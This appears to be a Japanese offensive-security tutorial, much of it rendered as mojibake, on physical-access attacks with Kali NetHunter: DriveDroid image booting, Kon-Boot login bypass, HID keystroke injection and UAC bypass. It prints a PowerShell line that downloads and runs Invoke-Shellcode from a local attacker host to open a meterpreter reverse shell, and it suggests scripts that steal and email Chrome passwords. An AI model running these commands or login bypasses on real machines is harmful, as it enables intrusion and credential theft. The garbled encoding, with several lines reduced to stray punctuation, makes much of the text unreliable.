ãµã€ã¯ã«ããã®èšäº
èªè ã®çãããããã«ã¡ã¯ïŒNethuterã®èšäºã·ãªãŒãºã®åã®éšåïŒç¬¬1éšãšç¬¬2éšïŒã楜ããã§ããã ããã§ããããã仿¥ã¯ãæ»æè èªèº«ã被害è ã®ã³ã³ãã¥ãŒã¿ãŒã«çŽæ¥ïŒç©ççã«ïŒã¢ã¯ã»ã¹ã§ããæ»æã«çŠç¹ãåœãŠãŸãããããè¡ããã
DriveDroid
DriveDroidã¯ãããã€ã¹ãCD / DVDãã©ã€ããŸãã¯USBãã©ãã·ã¥ãã©ã€ãã®ãµããããããšãå¯èœã«ããã¢ããªã±ãŒã·ã§ã³ã§ãã Nethunterã«ã¯å«ãŸããŠããŸããããNethunterã¢ããªã¹ãã¢ã«ãããŸãïŒã¡ãªã¿ã«ãPlay Marketã«ããããŸãïŒããããŠãã¡ãããã¢ããªã±ãŒã·ã§ã³ãæ©èœããã«ã¯ã«ãŒãæš©éãå¿ èŠã§ãã
DriveDroidã䜿çšãããšãISOããã³IMGã€ã¡ãŒãžãã¡ã€ã«ããšãã¥ã¬ãŒãã§ããŸãããŸããã¢ããªã±ãŒã·ã§ã³ã¯ãåºå®ãµã€ãºïŒãŠãŒã¶ãŒãèšå®ïŒã®ç©ºã®ç»åãã¡ã€ã«ãäœæããèªã¿åã/æžãèŸŒã¿æ©èœã§ãããããšãã¥ã¬ãŒãã§ããŸããããã¯ãããå°ã䟿å©ã§ãã
ã¢ããªã±ãŒã·ã§ã³ã¯ãæåã«èµ·åãããšãã«æ§æããå¿ èŠããããŸããç»é¢ãé çªã«è¡šç€ºãããããããã§ç¹å®ã®ã¢ã¯ã·ã§ã³ãå®è¡ããå¿ èŠããããŸããã«ãŒãæš©éã®æå®ãã€ã¡ãŒãžã®ãã£ã¬ã¯ããªã®æå®ãUSBã䜿çšããã·ã¹ãã ã®éžæãªã©ã§ããäžè¬çã«ããã®èšå®ã¯ãããã«é ããããã«å€§äžå€«ããšããå€ãååã«äŒŒãŠãããããããã§ã¯è©³ãã説æããŸãããåãä»ããããŸããããªãå Žåã¯ãUSBã䜿çšããããã«ã·ã¹ãã ã倿Žããå¿ èŠããããããã€ãã®ãªãã·ã§ã³ããéžæã§ããããšãä»ãå ããŠãããŸãïŒæšå¥šãªãã·ã§ã³ã¯äžéšã«ãããŸãïŒã
å³1ãDriveDroidã®ã»ããã¢ãããšã€ã³ã¿ãŒãã§ãŒã¹ã
ããã§ãããŸããŸãªã€ã¡ãŒãžãããŠã³ãããŠããããããèµ·åã§ããŸããæåã¯ã1ã€ã®ãã¹ãã€ã¡ãŒãžãDriveDroidBootTesterãã®ã¿ã䜿çšå¯èœã§ãããããã¯ãªãã¯ãããšãããã€ãã®ããŠã³ããªãã·ã§ã³ã衚瀺ãããŸãã
- èªã¿åãã¢ãŒãã®USBãã©ãã·ã¥ãã©ã€ãã®ããã«ã
- /,
- .
ããŠã³ãã«å¿ èŠãªãªãã·ã§ã³ãéžæãïŒãèªã¿åãå°çšusbããéžæïŒãã³ã³ãã¥ãŒã¿ãŒãåèµ·åããå€éšããã€ã¹ããã®èµ·åãæãŸããããã«BIOSã§ããã€ã¹ã®èµ·ååªå 床ã倿ŽããŸãïŒã¯ããWindowsãåã€ã³ã¹ããŒã«ããã®ãšåãã§ã:)ïŒããã¹ãŠãæ£ããè¡ããããšãã³ã³ãã¥ãŒã¿ãŒã¯ãšãã¥ã¬ãŒãããããã¹ãã€ã¡ãŒãžããèµ·åããŸãïŒãããããã§ããããšãããã«ããããŸãïŒã
å³2ã DriveDroidãã¹ãã€ã¡ãŒãžããã®èµ·åç»é¢ã
ãã®ã¢ããªã±ãŒã·ã§ã³ã䜿çšãããšãLiveCDãä»ããŠè¢«å®³è ã®ã³ã³ãã¥ãŒã¿ãŒã§èµ·åã§ãããã·ã³ã«ããŒããã£ã¹ã¯æå·åãã€ã³ã¹ããŒã«ãããŠããªãå Žåã¯ãå¿ èŠãªãã¡ã€ã«ãããŠã³ããŒãã§ããŸããååãšããŠããšãã¥ã¬ãŒããããLiveCDã§èš±å¯ãããŠããã¢ã¯ã·ã§ã³ãå®è¡ã§ããŸãããŠã€ã«ã¹ã¹ãã£ã³ã®å®è¡ãããŒãã£ã·ã§ã³ã®åããŒãã£ã·ã§ã³åãOSã®ã€ã³ã¹ããŒã«ãããã³ãã®ä»ã®å¯èœãªãªãã·ã§ã³ã§ãã
ç¹ã«ãWindowsããã³Macãã·ã³ã§èªèšŒããã€ãã¹ã§ããKon-BootããŒã«ã«ã€ããŠèª¬æããŸããWindowsã®ãªãªãŒã¹ããŒãã¯ãã¡ããMacã®ãªãªãŒã¹ããŒãã¯ãã¡ããææ°ããŒãžã§ã³ã®WindowsçšãŠãŒãã£ãªãã£ã¯ãWindows 10ã§ã®ãªã³ã©ã€ã³èªèšŒããã€ãã¹ããæ¹æ³ãç¥ã£ãŠããŸãããã ãããŠãŒãã£ãªãã£ã¯ææã§ãããããããã®OSã®å人ã©ã€ã»ã³ã¹ã®è²»çšã¯25ãã«ããã§ãããããããŸãæºè¶³ããªãã§ãã ãããããªãã¯ããªãã®å¥œããªè²¯éç®±ãæ¯ãå¿ èŠããããŸããäœ¿çšæ³ã®ã¢ã«ãŽãªãºã ã¯åçŽã§ãã
- DriveDroidã䜿çšããŠãŠãŒãã£ãªãã£ã€ã¡ãŒãžãããŠã³ãããŸãã
- ããããèµ·åãïŒå¿ èŠã«å¿ããŠBIOSã§èµ·ååªå 床ã倿ŽããŸãïŒãKon-BootããŒããŒãWindowsã®èµ·åãéå§ããŸãã
- ä»»æã®ãŠãŒã¶ãŒãéžæãã空ã®ãã¹ã¯ãŒãã§ãã®äžã«ç§»åããŸãã
ïŒç§ã®ãã®ã§ã¯ãªãïŒäœåã玹ä»ãããããªã¯ããã§èŠãããšãã§ããŸãã
ãŠãŒã¶ãŒäœéš
(Kon-Boot 2.4) Windows 7 home extended . . DriveDroid. IMG- 30 , âWritable USBâ. , Kon-Boot ââ-.
HIDæ»æ
Nethunterã«ã¯ãHIDæ»æãå®è¡ããããã®ããŒã«ãããã€ãçµã¿èŸŒãŸããŠããŸãïŒãã¥ãŒãã³ã€ã³ã¿ãŒãã§ã€ã¹ããã€ã¹ïŒããããã®æ»æãå®è¡ããã«ã¯ãæ»æããããã·ã³ã«çŽæ¥ã¢ã¯ã»ã¹ãããã®ãã·ã³ã§ç¹å®ã®ã¢ã¯ã·ã§ã³ãå®è¡ããæ©èœãå¿ èŠã§ãïŒã·ã¹ãã ã®ããã¯ãè§£é€ããå¿ èŠããããŸãïŒãHIDæ»æã¯ãã·ã¹ãã ã«ãã£ãŠæ£åœãªãŠãŒã¶ãŒã®åäœãšããŠèªèãããŸããã¢ã³ããŠã€ã«ã¹ãœãããŠã§ã¢ã¯ãååãšããŠãæ»æèªäœã«ã¯æ©èœããŸããããäœ¿çšæžã¿ã®è² è·ã«ã¯æ©èœããŸããããšãã°ãæªæã®ãããã¡ã€ã«ãããŠã³ããŒãããå Žåããmeterpreterã»ãã·ã§ã³ã転éããããã«ãšã³ã³ãŒããããŠããªããã¡ã€ã«ãããŠã³ããŒãããå Žåã§ãããããã£ãŠãæ»æäžã®æ¥åžžçãªæäœã®æéãççž®ããããšãå¯èœã§ãããããã¯ãæ»æããããã·ã³ãžã®ã¢ã¯ã»ã¹æéãå¶éãããŠããç¶æ³ã§éåžžã«åœ¹ç«ã¡ãŸãã
å
¥åèšèªã«ã€ããŠ
, , . , , . : ( Ducky Script) ( HID Attacks Nethunter). - :
.3. .
, , . : , â . .

.3. .
, , . : , â . .
ããããŒã¹ã¯ãªãã
Ducky Scriptã¯ããŠãŒã¶ãŒã«ä»£ãã£ãŠå®è¡ãããã¢ã¯ã·ã§ã³ãã¹ã¯ãªããåããããã«äœ¿çšã§ããã¹ã¯ãªããèšèªã§ããã€ã³ã¿ãŒããªã¿ãŒããã°ã©ã ãåããæ¥ç¶ããã€ã¹ã¯ãããŒããŒããšããŠã¹ã®å ¥åãã·ãã¥ã¬ãŒãããŠãã³ã³ãã¥ãŒã¿ãŒã«ä¿¡å·ãéä¿¡ããŸãã Ducky Scriptã¯USBã©ããŒããããŒããã€ã¹ã«äœ¿çšãããŸãïŒçŸåšAmazonã§ã¯çŽ120ãã«ããããŸãïŒã
å³4ã USBã©ããŒããããŒããã€ã¹ãããã
Nethunterã«ã¯ã€ã³ã¿ããªã¿ïŒNetHunterã¢ããªã±ãŒã·ã§ã³-ãDuckHunterHIDãã¿ãïŒãçµã¿èŸŒãŸããŠããŸãããæ£ããåäœãããããšãã§ããŸããã§ããã
å³5ã Nethunter-DuckHunterHIDã
ããããNetHunterã¹ãã¢ã«ã¯Ruckyã¢ããªã±ãŒã·ã§ã³ïŒv 1.9ïŒããããããã¯DuckScriptã€ã³ã¿ãŒããªã¿ãŒã§ããããŸããã¢ããªã¯ããŒããŒãå ¥åãšããŒã¹ãããŒã¯ãåé¡ãªãéä¿¡ããŸãããããŠã¹ãåãå§ããŸããã
Ruckyã¢ããªã±ãŒã·ã§ã³ãéãããªã³ã¯ä»ãã®Chromeãèµ·åããã¹ã¯ãªãããèšè¿°ããŠèµ·åããŸãã

å³6ãã©ãããŒãChromeèµ·åã¹ã¯ãªããã
DuckyScriptã®å®è¡ããã·ã³äžã§ã©ã®ããã«èŠãããã
ããã§ãããŠãããµã³ãã«ã¹ã¯ãªãããåéããã°ããå£çŽã«ãããããã°ãèšå®ããããChromeãããã¹ã¯ãŒããçãã§ãã¡ãŒã«ã§éä¿¡ããŠãã ãã...æ³åã§ãããã¹ãŠã®å¯èœæ§ããããŸãïŒ
HIDæ»æ
Nethunterã¢ããªã«ã¯ã[HIDæ»æ]ã¿ãããããŸãããã®ã°ã«ãŒãããã®æ»æã¯ããããã€ã¹ãããŒããŒãå ¥åãã·ãã¥ã¬ãŒãããããšããååã«åºã¥ããŠæ©èœããŸãããç¹å®ã®ãã¿ãŒã³ã察象ãšããŠããŸãããã©ã¹ã¯ã管çè ããã³ãã³ãã©ã€ã³ãèµ·åãããšãã«UACãã€ãã¹ãªãã·ã§ã³ïŒWin7ãWin8ãWin10çšïŒãããããšã§ãããããã£ãŠã管çè ã¢ã«ãŠã³ãã®è³æ Œæ å ±ãå ¥åããå¿ èŠããªãããã«ãå°ãªããšãããŒã«ã«ç®¡çè ã®äžã§ãã°ã€ã³ããå¿ èŠããããŸãã
å³7ãUACãã€ãã¹ã
æ»æãæ©èœãããããã«äœããã¹ãã
, , MIDI.
.8. MIDI.
.8. MIDI.
HIDæ»æã®ãã¿ãŒã³ãèŠãŠã¿ãŸãããã
Powersploit
ãã®ãã¿ãŒã³ã¯ããªã¢ãŒããã·ã³ããPowershellã¹ã¯ãªãããå®è¡ããããšãç®çãšããŠããŸããããã«ãããæ»æããããã·ã³ããmeterpreterã·ã§ã«ã転éãããŸãã

å³ïŒ 9.Nethunter-HIDæ»æ-PowerSploitã
å³ïŒ 10.ã³ãã³ãã©ã€ã³ã§ã®å®è¡çµæãBASE64æååããã³ãŒãããçµæã ã¹ã¯ãªãŒã³ã·ã§ãããããããããã«ãã¹ã¯ãªããå®è¡ã®åé¡ã®ããã«æ»æã¯å€±æããŸãããæå®ããããã©ã¡ãŒã¿ã«åºã¥ããŠãEmpireProjectãªããžããªã®Invoke-Shellcode.ps1ã䜿çšããå¯èœæ§ãæãé«ããšå€æããŸããã Invoke-Shellcode.ps1ãŸãã¯PowerSploitãªããžããªã¹ã¯ãªãããæŽæ°ãããPayloadãã©ã¡ãŒã¿ããããŸãããã¹ã¯ãªããã®å€ããé©åãªãããŒãžã§ã³ã®äœ¿çšãå³ã«ç€ºããŸãã 10. BASE64ã§ãšã³ã³ãŒããããæååã¯ãã¢ããªã±ãŒã·ã§ã³ãŠã£ã³ããŠã®ãã¹ãŠã®ãã©ã¡ãŒã¿ãŒã衚ããŸããäœãã倿Žããå Žåã¯ãäžã®ãæŽæ°ããã¿ã³ãå¿ããªãã§ãã ãããããã¯éèŠã§ãã
iex (New-Object Net.WebClient).DownloadString("http://192.168.1.45:80/Invoke-Shellcode.ps1"); Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost 192.168.1.45 -Lport 8080 -Force
ãããã£ãŠãéçºè ãNethunterã¢ããªã±ãŒã·ã§ã³ã®ãã®éšåãæŽæ°ããã®ãåŸ ã£ãŠããŸãã
WindowsCMD
ããã§ã¯ãã¹ãŠãç°¡åã§ãããã®ãã¿ãŒã³ã§ã¯ãã³ãã³ãã©ã€ã³ãèµ·åãããscriptãã©ã¡ãŒã¿ãŒã§æå®ãããã³ãã³ããé æ¬¡å®è¡ãããŸãã管çè ãšããŠã³ãã³ãã©ã€ã³ãå®è¡ããããšãã§ããŸããä¿åããã¹ã¯ãªãããä¿åããã³ããŒãã§ããŸãããããŠããæŽæ°ããã¿ã³ãå¿ããªãã§ãã ããã

å³ïŒ11.Nethunter-HIDæ»æ-WindowsCMDã
å³ïŒ12.ã³ãã³ãã©ã€ã³ã§ã®å®è¡çµæã
泚æ
â*â, . , âipconfigâ âpconfigâ. :)
Powershell HTTPãã€ããŒã
ãã®ãã¿ãŒã³ã¯ãPowershellãã€ããŒããããŒãããŠå®è¡ããå¿ èŠããããŸããããããããã¯ç§ã«ã¯ãŸã£ããæ©èœããŸããã§ãããæ»æãéå§ããããšããã¢ã¯ã·ã§ã³ã¯çºçãããè² è·ã®ããã¹ã¯ãªãããé 眮ãããWebãµãŒããŒã®ãã°ã¯ç©ºã®ãŸãŸã§ããã

å³13ã Nethunter-HIDæ»æ-PowershellHTTPãã€ããŒãã
ãããŠãèªã¿çµãã人ã®ããã®ã¡ãã£ãšããããŒãã¹:)
KeXãããŒãžã£ãŒ
ãã«ã«ãªLinuxãã¹ã¯ãããã€ã³ã¿ãŒãã§ãŒã¹ãã¯ããã¯ãïŒ Nethunterã«ã¯ãVNCãµãŒããŒãçµã¿èŸŒãŸããŠããŸãïŒä»®æ³ãããã¯ãŒã¯ã³ã³ãã¥ãŒãã£ã³ã°-ã³ã³ãã¥ãŒã¿ãŒãã¹ã¯ãããã«ãªã¢ãŒãã¢ã¯ã»ã¹ããããã®ã·ã¹ãã ïŒããã¹ãŠãéåžžã«ç°¡åã«èšå®ãããŸãã Nethunterã¢ããªã±ãŒã·ã§ã³ã®[KeXManager]ã¿ãã§ã[SETUP LOCAL SERVER]ãã¿ã³ãã¯ãªãã¯ãããµãŒããŒã®ãã¹ã¯ãŒããèšå®ããŸãã ãSTARTSERVERããæŒããšããµãŒããŒã®ã¹ããŒã¿ã¹ããRUNNINGãã«å€ãããŸãã ãOPENKEXCLIENTããã¯ãªãã¯ãããããããèšå®ãããã¹ã¯ãŒããå ¥åãããšããã¹ã¯ãããã€ã³ã¿ãŒãã§ãŒã¹ãèµ·åããŸãã
å³14ã VNCãµãŒããŒã®æ§æãšæ¥ç¶ã
å³15ã VNCãµãŒããŒã«æ¥ç¶ããçµæã
å¥ã®ããã€ã¹ããæ¥ç¶ããå Žåã¯ã[ããŒã«ã«ãã¹ãã®ã¿]ãã§ãã¯ããã¯ã¹ããªãã«ããŠãã¯ã©ã€ã¢ã³ãããµãŒããŒã«ãå°éãã§ããããã«ããå¿ èŠããããŸãããµãŒããŒãåèµ·åããŸãããŸããå¥ã®ããã€ã¹ã§VNCã¯ã©ã€ã¢ã³ãã䜿çšããŠãNethunterããã€ã¹ã®IPãšããŒã5901ïŒããšãã°ã192.168.1.3ïŒ5901ïŒãæå®ããŠæ¥ç¶ããŸããæ¬¡ã«ã以åã«èšå®ãããã¹ã¯ãŒããå ¥åãããšãæ¥ç¶ãããŸãã
å³16ãå¥ã®ããã€ã¹ããVNCãµãŒããŒã«æ¥ç¶ããçµæã
ããã¯ä»ã®ãšãããã¹ãŠã§ãããã¹ãŠãæè²ç®çã®ã¿ã§ããããšãå¿ããªãã§ãã ãã:)ãŸããïŒ
ãµã€ã¯ã«ããã®èšäº